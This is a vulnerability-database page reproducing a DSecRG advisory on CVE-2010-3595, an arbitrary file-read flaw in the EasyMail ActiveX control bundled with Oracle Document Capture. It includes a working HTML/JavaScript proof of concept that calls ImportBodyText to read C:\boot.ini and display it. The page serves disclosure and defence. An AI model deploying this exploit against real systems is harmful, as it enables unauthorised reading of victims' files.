Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Document Capture Insecure READ Method

🗓️ 26 Jan 2011 00:00:00Reported by Alexey SintsovType 
zdt
 zdt🔗 0day.today👁 29 Views

Oracle Document Capture Insecure READ Method vulnerability in EasyMail ActiveX Contro

Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories		Oracle Document Capture EasyMail ActiveX Control Information Disclosure (CVE-2010-3595)
27 Feb 201100:00
checkpoint_advisories
CVE		CVE-2010-3595
19 Jan 201115:00
cve
Cvelist		CVE-2010-3595
19 Jan 201115:00
cvelist
Exploit DB		Oracle - Document Capture Insecure READ Method
26 Jan 201100:00
exploitdb
erpscan		Oracle Document Capture ImportBodyText — read files
29 Jan 201000:00
erpscan
exploitpack		Oracle - Document Capture Insecure READ Method
26 Jan 201100:00
exploitpack
NVD		CVE-2010-3595
19 Jan 201116:00
nvd
Oracle		Oracle Critical Patch Update - January 2011
18 Jan 201100:00
oracle
Oracle		Oracle Critical Patch Update - January 2011
18 Jan 201100:00
oracle
Tenable Nessus		Oracle Document Capture Multiple Vulnerabilities
4 Feb 201100:00
nessus
Rows per page
Application:                    Oracle Document Capture 
Versions Affected:              10.1350.0005
Vendor URL:                     http://www.oracle.com/technology/software/products/content-management/index_dc.html
Bugs:                           Insecure READ method
Exploits:                       YES
Reported:                       29.01.2010
Second report:                  02.02.2010                   
Date of Public Advisory:        24.01.2010 
CVE:                            CVE-2010-3595
Authors:                        Alexey Sintsov
                                by Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
 
 
 
Description
***********
 
EasyMail ActiveX  Control (emsmtp.dll)  that included into Oracle Document Capture distrib
can be used to read any file in target system. Vulnerable method is "ImportBodyText()".
 
 
 
Details
*******
 
For example if you enter filename "C:\\boot.ini" in "ImportBodyText" method then control will
open and read file "C:\boot.ini". Content of boot.ini will be loaded into property "BodyText" .
 
 
Class EasyMailSMTPObj
GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}
Number of Interfaces: 1
Default Interface: IEasyMailSMTPObj
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False
 
 
 
Example:
*******
 
<HTML>
        <HEAD>
        <TITLE>DSECRG</TITLE>
        </HEAD>
        <BODY>
         
        <OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>
 
        <SCRIPT>
                 
        function Exploit(){
                ora.ImportBodyText("C:\\boot.ini");            
                document.write("Try to read c:\\boot.ini:<br><br>"+ora.BodyText);
        }
        Exploit();
 
        </SCRIPT>
</BODY>
</HTML>
 
 
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=307
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html



#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jan 2011 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.28808
oracle document captureinsecure read methodeasymail activex controlvulnerabilityexploitcve-2010-3595activexread methodsecurity advisorydigital security research grouporacle10.1350.0005httpfile read vulnerability
29